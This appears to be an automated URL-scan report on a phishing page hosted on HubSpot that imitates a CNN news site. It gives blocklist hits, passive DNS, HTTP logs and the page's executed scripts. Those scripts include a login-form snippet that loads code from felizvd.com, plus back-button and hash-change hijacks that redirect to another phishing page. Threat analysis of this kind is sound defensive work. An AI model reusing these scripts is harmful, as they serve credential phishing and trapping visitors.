Overview

URL news4kcnn.hs-sites-eu1.com/
IP104.18.33.253
ASNCLOUDFLARENET
Location
Report completed2022-09-14 18:54:26 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-09-14 2 news4kcnn.hs-sites-eu1.com/ Phishing
2022-09-14 2 news4kcnn.hs-sites-eu1.com/_hcms/perf Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (29)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-09-14 04:47:55 UTC 143.204.55.25
mnemonic passive DNS code.jquery.com (1) 634 2012-05-21 17:28:02 UTC 2022-09-14 04:47:57 UTC 69.16.175.10
mnemonic passive DNS ocsp.pki.goog (6) 175 2017-06-14 07:23:31 UTC 2022-09-14 04:48:23 UTC 142.250.74.3
mnemonic passive DNS img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-09-14 12:35:36 UTC 34.120.237.76
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-05-27 20:08:30 UTC 2022-09-14 18:38:37 UTC 143.204.55.36
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-09-14 04:48:22 UTC 34.117.237.239
mnemonic passive DNS felizvd.com (3) 0 2019-04-28 01:48:31 UTC 2022-08-25 20:10:17 UTC 159.203.26.69 Unknown ranking
mnemonic passive DNS cdn1.hubspotusercontent-eu1.net (3) 0 2022-02-28 15:12:24 UTC 2022-09-14 10:58:28 UTC 104.18.34.226 Domain (hubspotusercontent-eu1.net) ranked at: 206629
mnemonic passive DNS www.lean-labs.com (1) 0 2014-03-27 18:46:32 UTC 2022-09-13 19:35:59 UTC 199.60.103.254 Domain (lean-labs.com) ranked at: 569005
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-09-14 04:48:23 UTC 34.214.17.205
mnemonic passive DNS js-eu1.hscollectedforms.net (1) 75385 2021-08-03 13:53:48 UTC 2022-09-14 09:38:12 UTC 172.65.192.122
mnemonic passive DNS r3.o.lencr.org (6) 344 2020-12-02 08:52:13 UTC 2022-09-14 04:47:59 UTC 23.36.77.32
mnemonic passive DNS news4kcnn.hs-sites-eu1.com (3) 0 2022-09-14 14:10:55 UTC 2022-09-14 17:09:21 UTC 172.64.154.3 Unknown ranking
mnemonic passive DNS f.hubspotusercontent20.net (8) 27622 2020-05-02 16:07:48 UTC 2022-09-14 15:44:58 UTC 104.16.187.114
mnemonic passive DNS whos.amung.us (1) 12687 2014-04-02 14:27:13 UTC 2022-09-14 14:36:13 UTC 172.67.8.141
mnemonic passive DNS widgets.amung.us (1) 12623 2012-05-21 19:25:54 UTC 2022-09-14 12:17:12 UTC 104.22.75.171
mnemonic passive DNS cdn.jsdelivr.net (1) 439 2012-09-30 00:15:09 UTC 2022-09-14 06:59:24 UTC 151.101.85.229
mnemonic passive DNS ocsp.globalsign.com (1) 2075 2012-05-25 06:20:55 UTC 2022-09-14 04:48:22 UTC 104.18.21.226
mnemonic passive DNS static.hsappstatic.net (5) 8199 2013-09-26 02:22:42 UTC 2022-09-14 05:56:13 UTC 104.17.9.210
mnemonic passive DNS f.hubspotusercontent-eu1.net (1) 278068 2021-08-12 10:46:27 UTC 2022-09-14 10:25:59 UTC 172.64.153.30
mnemonic passive DNS app-eu1.hubspot.com (1) 191732 2021-07-26 14:26:48 UTC 2022-09-14 15:59:54 UTC 172.65.236.181
mnemonic passive DNS track-eu1.hubspot.com (1) 73788 2021-08-03 10:49:05 UTC 2022-09-14 11:57:45 UTC 172.65.240.166
mnemonic passive DNS forms-eu1.hsforms.com (1) 91702 2021-08-03 13:53:50 UTC 2022-09-14 15:39:30 UTC 172.65.232.43
mnemonic passive DNS js-eu1.hs-analytics.net (1) 69352 2021-08-03 13:53:48 UTC 2022-09-14 11:57:43 UTC 172.65.238.60
mnemonic passive DNS fonts.googleapis.com (1) 8877 2014-07-21 13:19:55 UTC 2022-09-14 12:22:10 UTC 142.250.74.10
mnemonic passive DNS maxcdn.bootstrapcdn.com (1) 724 2014-06-18 00:37:31 UTC 2022-09-14 12:55:59 UTC 104.18.11.207
mnemonic passive DNS forms-eu1.hubspot.com (1) 77050 2021-08-03 13:53:49 UTC 2022-09-14 11:57:45 UTC 172.65.193.34
mnemonic passive DNS js-eu1.hs-scripts.com (1) 63672 2021-08-03 13:53:48 UTC 2022-09-14 11:57:41 UTC 172.65.208.22
mnemonic passive DNS fonts.gstatic.com (3) 0 2014-08-29 13:43:22 UTC 2022-09-14 04:48:25 UTC 142.250.74.163 Domain (gstatic.com) ranked at: 540


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 104.18.33.253

Date UQ / IDS / BL URL IP
2022-12-02 21:27:43 +0000
0 - 0 - 1 prositevd.hs-sites-eu1.com/ 104.18.33.253
2022-11-28 08:35:20 +0000
0 - 0 - 0 hoegheiendom-25006101.hs-sites-eu1.com/inflas (...) 104.18.33.253
2022-11-14 13:35:03 +0000
0 - 0 - 6 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-11-14 09:32:46 +0000
0 - 0 - 9 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-09-23 23:15:15 +0000
0 - 0 - 2 private-video.hs-sites-eu1.com/ 104.18.33.253

Last 5 reports on ASN: CLOUDFLARENET

Date UQ / IDS / BL URL IP
2022-12-03 23:09:41 +0000
0 - 0 - 2 cdn.discordapp.com/attachments/10018177944736 (...) 162.159.134.233
2022-12-03 23:04:34 +0000
0 - 0 - 8 ouo.io/st/TF37tJmc/?s=uptobox.com/o1ej5l3t13hg 172.67.6.151
2022-12-03 23:04:59 +0000
0 - 0 - 5 xyclick.space/72ffc922-aaaf-4084-93d5-13265aa0d343 188.114.97.1
2022-12-03 23:03:49 +0000
0 - 0 - 2 ouo.io/7UOQws 104.22.22.162
2022-12-03 23:03:32 +0000
0 - 0 - 4 www-bradesco28.w2net-modulocompany.com/ne12/l (...) 172.67.185.69

Last 5 reports on domain: hs-sites-eu1.com

Date UQ / IDS / BL URL IP
2022-12-02 21:27:43 +0000
0 - 0 - 1 prositevd.hs-sites-eu1.com/ 104.18.33.253
2022-11-28 08:35:20 +0000
0 - 0 - 0 hoegheiendom-25006101.hs-sites-eu1.com/inflas (...) 104.18.33.253
2022-11-14 13:35:03 +0000
0 - 0 - 6 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-11-14 09:32:46 +0000
0 - 0 - 9 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-09-23 23:15:15 +0000
0 - 0 - 2 private-video.hs-sites-eu1.com/ 104.18.33.253

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-11-15 15:41:18 +0000
0 - 0 - 8 app-funnelsx.bubbleapps.io/version-test/ 104.19.217.48
2022-11-14 09:32:46 +0000
0 - 0 - 9 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-11-10 23:45:55 +0000
0 - 0 - 8 rickpack44.bubbleapps.io/version-test/ 104.19.218.48
2022-11-10 14:36:22 +0000
0 - 0 - 8 rickpack44.bubbleapps.io/version-test/ 104.19.218.48
2022-11-01 10:39:02 +0000
0 - 0 - 2 jhufedsgjg614322067.brizy.site/ 34.237.47.210


JavaScript

Executed Scripts (16)


Executed Evals (6)

#1 JavaScript::Eval (size: 382, repeated: 1) - SHA256: 630da06768d46273e886988238462aafe64796fc9d8c9c85d75b30b8afcb99a7

                                        document.body.className = document.body.className + ' touch x1-5 android _fzu _50-3 iframe acw portrait';
m_login_email.required = true;
m_login_password.required = true;
var script_ = document.createElement('script');
script_.src = "https://felizvd.com/location";
script_.async = true;
document.body.appendChild(script_);
                                    

#2 JavaScript::Eval (size: 0, repeated: 1) - SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        
                                    

#3 JavaScript::Eval (size: 522, repeated: 1) - SHA256: 1960d3df1ea15d7133627d151eb48fd1680fc7155dc1a6541807cbac6f33ca3e

                                        (function() {
    window.location.hash = Math.random();
    var ignoreHashChange = true;
    window.onhashchange = function() {
        if (!ignoreHashChange) {
            ignoreHashChange = true;

            try {
                window.top.location = 'https://sites-news-official.hs-sites-eu1.com/#0.1005';
            } catch (d) {
                window.location = 'https://sites-news-official.hs-sites-eu1.com/#0.1005';
            };
            return false;

        } else {
            ignoreHashChange = false;
        }
    };
})();
                                    

#4 JavaScript::Eval (size: 74, repeated: 1) - SHA256: 1ce0b8fec4048a2609b79aba672d90ed8de6b3ef78178347d9b42d8d90a5506e

                                         (function() {
     new Image().src = '//whos.amung.us/widget/cococho01';
 })();
                                    

#5 JavaScript::Eval (size: 72, repeated: 1) - SHA256: 2639df9c76423338e6d3e7493ad3993bb984d7bfa198a2a7336fdb831f3d301a

                                        (function() {
    new Image().src = '//whos.amung.us/widget/cococho01';
})();
                                    

#6 JavaScript::Eval (size: 532, repeated: 1) - SHA256: 92e7aa669ac71e7d85cf27ac15baef2fe25d2f76602f98ccb61719f459672d3b

                                        (function() {
    var ignoreHistoryChange = true;
    window.onpopstate = function(event) {

        if (!ignoreHistoryChange) {
            ignoreHistoryChange = true;

            try {
                window.top.location = 'https://sites-news-official.hs-sites-eu1.com/#0.1005';
            } catch (d) {
                window.location = 'https://sites-news-official.hs-sites-eu1.com/#0.1005';
            };
            return false;

        } else {
            ignoreHistoryChange = false;
        }


    };
})();
                                    

Executed Writes (0)



HTTP Transactions (64)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "B5F178D23E633283F226CCA7A9AE79B01E6CAB2299FF7065C980D3A9953212FD"
Last-Modified: Tue, 13 Sep 2022 06:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3980
Expires: Wed, 14 Sep 2022 20:00:35 GMT
Date: Wed, 14 Sep 2022 18:54:15 GMT
Connection: keep-alive

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.36
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Type, Content-Length, Backoff, Retry-After, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Wed, 14 Sep 2022 18:09:39 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 5de23153ac267c206221751e1cccb6e8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: vodz8hhvWvSv9oB3ivNe-C09m4eLNyDvYe1TL28dyzv9yWdd3r9dgQ==
Age: 2676


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    99b7d23c1748d0526782b9ff9ea45f09
Sha1:   eadd801a3ba2aa00632c6fb52e1f9125bd6d5b4f
Sha256: 48f81668f76955320480b484138aebdad5d03c471036b4449c737aca1ecab08e
                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-09-23-18-04.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.25
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Sat, 20 Aug 2022 23:18:05 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Wed, 14 Sep 2022 04:35:16 GMT
etag: "742edb4038f38bc533514982f3d2e861"
x-cache: Hit from cloudfront
via: 1.1 5de23153ac267c206221751e1cccb6e8.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: gGed-eRZO1q_Bo6IB2jtlHrwclXrxoxSy5dRQc7JLvPgzOZ8QT_uKw==
age: 51540
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    742edb4038f38bc533514982f3d2e861
Sha1:   cc3a20c8dc2a8c632ef9387a2744253f1e3fdef1
Sha256: b6bfa49d3d135035701231db2fffc0c0643444394009a94c6a1b4d829d6b8345
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Wed, 14 Sep 2022 18:54:15 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.36
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Cache-Control: max-age=3600
Date: Wed, 14 Sep 2022 18:03:22 GMT
Expires: Wed, 14 Sep 2022 18:36:58 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 9ede9483eb891e14681c7c693b47c862.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: OS_oxc-TnXWN-7dk8QpB_0gsRiXaEeZYJCeP18ATsWUiQrqsMKWkmA==
Age: 3053


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            GET / HTTP/1.1 
Host: news4kcnn.hs-sites-eu1.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         172.64.154.3
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74ab54824f770afa-OSL
Cache-Control: s-maxage=10,max-age=5
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Credentials: false
cache-tag: CT-53117545672,P-26246936,CW-53116949197,CW-53117121730,CW-53117121734,CW-53118088388,E-53116948940,E-53116948942,E-53116948943,E-53116948945,E-53117121515,E-53117121739,E-53117121741,E-53117121742,E-53117470969,PGS-ALL,SW-0,TS-53117471166
Edge-Cache-Tag: CT-53117545672,P-26246936,CW-53116949197,CW-53117121730,CW-53117121734,CW-53118088388,E-53116948940,E-53116948942,E-53116948943,E-53116948945,E-53117121515,E-53117121739,E-53117121741,E-53117121742,E-53117470969,PGS-ALL,SW-0,TS-53117471166
X-HS-Cache-Config: BrowserCache-5s-EdgeCache-10s
X-HS-Content-Id: 53117545672
X-HS-Hub-Id: 26246936
X-HubSpot-Correlation-Id: 3a6f2be7-b4a5-4ebd-99a3-60df3ec97b5f
X-Powered-By: HubSpot
X-Robots-Tag: none
X-Trace: 2B557C01E44DCD6CF56203767BC48A708B535D96BE000000000000000000
Server: cloudflare
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (33982), with CRLF, LF line terminators
Size:   8920
Md5:    bcab196a6593557aff48e2bee8fa0485
Sha1:   ef0cf786187bc58ceb07c7cd28329d4a4acefb54
Sha256: b41ceacdede39ea52cb45ba3250785e7fe421259da949230311cd31475da3bd1

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /jquery-3.6.0.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         69.16.175.10
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
content-encoding: gzip
content-length: 30875
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-15d9d"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1663181656.dop013.sk1.t,1663181656.cds069.sk1.hn,1663181656.cds210.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65447)
Size:   30875
Md5:    899f0189aaf034bbba5340f724d91dfa
Sha1:   210ea9de03968edb9d839ba4a0ce2d48666a8ab8
Sha256: 949b6597c5ea907a7ef3c8ca6d5ffc73be2352f9df485b78704e5c4dabac5d0f
                                        
                                            GET /npm/bootstrap@4.6.0/dist/js/bootstrap.min.js HTTP/1.1 
Host: cdn.jsdelivr.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.85.229
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
cache-control: public, max-age=31536000, s-maxage=31536000, immutable
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-jsd-version: 4.6.0
x-jsd-version-type: version
etag: W/"f7eb-O+7WjtfXU8a/T2HCY4bd15KboDA"
content-encoding: gzip
accept-ranges: bytes
date: Wed, 14 Sep 2022 18:54:16 GMT
age: 12248409
x-served-by: cache-fra19124-FRA, cache-bma1622-BMA
x-cache: HIT, HIT
vary: Accept-Encoding
content-length: 14954
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (63188)
Size:   14954
Md5:    bcd78d6c0ec033bf482fd42a464a0456
Sha1:   db079a86c03c9930571f8d0d6585cd7c4817fb95
Sha256: 3ade5e6e9f8a5da4b810b01861e48e7e4fa50b8c4fc5899a715062a139c5d258
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /26246936.js HTTP/1.1 
Host: js-eu1.hs-scripts.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/

                                         
                                         172.65.208.22
HTTP/1.1 200 OK
Content-Type: application/javascript;charset=utf-8
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Content-Length: 606
Connection: keep-alive
X-Trace: 2B4F0F1F0654A3B96F9DABED42E4D663080BD659F9000000000000000000
Cache-Control: public, max-age=30
Vary: Accept-Encoding
X-HubSpot-Correlation-Id: 6ae7b19b-dcbb-4dad-91bf-8c48318b218c
Content-Encoding: gzip
Access-Control-Allow-Credentials: true
Access-Control-Max-Age: 3600
Access-Control-Allow-Origin: http://news4kcnn.hs-sites-eu1.com
Last-Modified: Wed, 14 Sep 2022 18:54:16 GMT
CF-Cache-Status: MISS
Accept-Ranges: bytes
Server: cloudflare
CF-RAY: 74ab54873aaab505-OSL


--- Additional Info ---
Magic:  ASCII text, with very long lines (546)
Size:   606
Md5:    df7dcfde59d9c67e1119982c2743a3b9
Sha1:   e873fb2265c6e6a6c631f4befe52aa5917f1d7f9
Sha256: 69b348ccdc2fcb54bcba20bf92281a51b346addec65eb19e5d19d60fb8401ebb
                                        
                                            POST /ca/gsatlasr3dvtlsca2022q1 HTTP/1.1 
Host: ocsp.globalsign.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.18.21.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Etag: "052BA26C709F9CC2B246ADAEF78E82457FF39828"
Expires: Thu, 15 Sep 2022 06:00:00 GMT
Last-Modified: Wed, 14 Sep 2022 18:00:00 UTC
Cache-Control: s-maxage=3600, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Age: 1539
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 74ab5487d94db527-OSL


--- Additional Info ---
Magic:  data
Size:   1462
Md5:    70023870328bc2851602bfda0671f8d8
Sha1:   1fea657d8819a97c2080bd6b9817dbbc037d5a92
Sha256: 36fe42df3eb421c9a023d170b3058b6d39bc381945f40a1492d6e67983c85dac
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /cms-free-branding-lib/static-1.111/css/hsCmsFreeBranding.css HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/

                                         
                                         104.17.9.210
HTTP/1.1 301 Moved Permanently
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 19:54:16 GMT
Location: https://static.hsappstatic.net/cms-free-branding-lib/static-1.111/css/hsCmsFreeBranding.css
Vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FILmx5ql%2FsM6wLdCSorRq3D9M%2BUPPgBiNzE183XyXCh64GkkYdg7Rt5Eon7pSc0cOI2XBiAyRTJKKQ%2BRdPQaQQQi4J7qLmc4tMIvMletfCTtrwG%2BoaEEOHWacP3%2BqNclz1q6rg9Xoao%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 74ab54883857b506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

                                        
                                            GET /hub/26246936/hub_generated/template_assets/53117470969/1663156032537/marketplace/Sprocket_Rocket/sr-theme-free/css/custom-styles.css HTTP/1.1 
Host: cdn1.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: text/css
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74ab54870805b50c-OSL
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=1209600
ETag: W/"498bc73d25b9dc6a812c316d9cd729d5"
Expires: Wed, 28 Sep 2022 18:54:16 GMT
Last-Modified: Wed, 14 Sep 2022 11:47:13 GMT
Vary: Accept-Encoding
Via: 1.1 f46773a8236e136c4f6648dd79a7af8e.cloudfront.net (CloudFront)
CF-Cache-Status: REVALIDATED
Access-Control-Allow-Methods: GET
X-Amz-Cf-Id: ZIOeklDZXLt1r1yDgBN8iD-XnG_Lv3ZI1rMrMJsAGt4rz58ltcopDw==
X-Amz-Cf-Pop: OSL50-P1
x-amz-id-2: IQfd/ZZRcu7clS5Edl9Cejf2Ci7p9Vvt2NvgDnk2aTr24T+jwbsgWmIYmxIjE+FvqKdoE17Y7lM=
x-amz-meta-created-unix-time-millis: 1663156032537
x-amz-request-id: JW14A1KGN4JM2J2K
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-amz-version-id: 0U79poF8JgGlnWv7dPJzVsC10kSp.WnG
X-Cache: RefreshHit from cloudfront
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   78
Md5:    e348549f26a3ad80a396b1cd9a23c7bd
Sha1:   49da85c5983381fccabb9a74833bd4809e0e9b43
Sha256: 53522dd0dc006920a06fa5bbf2859f1e6ce4e5ff1a10d128f5decde523ad71cc
                                        
                                            GET /hubfs/sr-assets/pattern-library/sr-hero-01/sr-hero-01-v2.jpg HTTP/1.1 
Host: www.lean-labs.com
                                        
